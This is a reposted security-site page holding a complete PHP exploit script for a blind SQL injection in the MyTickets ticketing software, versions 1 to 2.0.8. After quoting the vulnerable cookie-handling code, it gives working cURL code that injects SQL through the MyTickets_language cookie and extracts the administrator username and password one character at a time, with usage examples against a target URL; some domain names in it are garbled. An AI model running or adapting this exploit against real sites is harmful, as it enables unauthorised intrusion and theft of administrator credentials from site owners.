MyTickets 1至2.0.8盲注 - 网站安全 - 自学php

<?php    /*      ---------------------------------------------------------------      MyTickets <=  Remote Blind SQL Injection Exploit     ---------------------------------------------------------------   作者.: al-swisre  HdhCmsTest2cto测试数据 oy3[at]hotmail[dot]com      下载地址： http://phpx3测试数据/scripts.html#mytickets     影响版本 from 1 to 2.0.8                [-] 缺陷代码位置 include/system/general/define.php:           43.    if(empty($cookies['language'])){      44.             setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/");      45.             $language = $setting['default_language'];      46.     }else{      47.           if($db->count('languages',"`id`='".$cookies['language']."'") == 0){      48.                    $language  = $setting['default_language'];      49.               }      50.           $language   = $cookies['language'];      52.      }      52.      53.      $language_array  = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'"));              */              print "\n+--------------------------------------------------------------------+";    print "\n| MyTickets <= Remote Blind SQL Injection Exploit by al-swisre       |";    print "\n+--------------------------------------------------------------------+\n";              if (!extension_loaded('curl')) die("cURL extension required\n");    error_reporting(E_ERROR);    set_time_limit(0);              function get($url,$inj)    {                     $curl = curl_init();                curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);                curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3);                curl_setopt($curl,CURLOPT_URL,$url);                curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj");                curl_setopt($curl, CURLOPT_HEADER, 1);                curl_setopt($curl, CURLOPT_VERBOSE, 0);                $calis = curl_exec($curl);                @curl_close($calis);                return $calis;              }         function chek_get($connect)    {                  if(eregi("include",$connect))              {                return false;              }              else              {                return true;              }         }              if ($argc < 2)    {                print "\nUsage......: php $argv[0] <url>\n";                print "\nExample....: php $argv[0] http:// HdhCmsTest2cto测试数据 /mytickets/ ";                print "\nExample....: php $argv[0] http://localhost/mytickets/\n";                die();    }         $sql_f = chek_get(get($argv[1],"' and 1='2 /*"));    $sql_t = chek_get(get($argv[1],"' and 1='1 /*"));              if($sql_t == $sql_f)    {                   print "\n\t sorry: magic_quotes_gpc = On ): \n";              die();    }         print "\n\t[+] Getting Admin Username and Password\n\n\t";                   for ($g = 1; $g <= 40; $g++) {  //eidt    for ($i = 46; $i <= 122; $i++) {                $inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*"));                if($inject == true){print  chr($i);}    }    }           ?>

查看更多关于MyTickets 1至2.0.8盲注 - 网站安全 - 自学php的详细内容...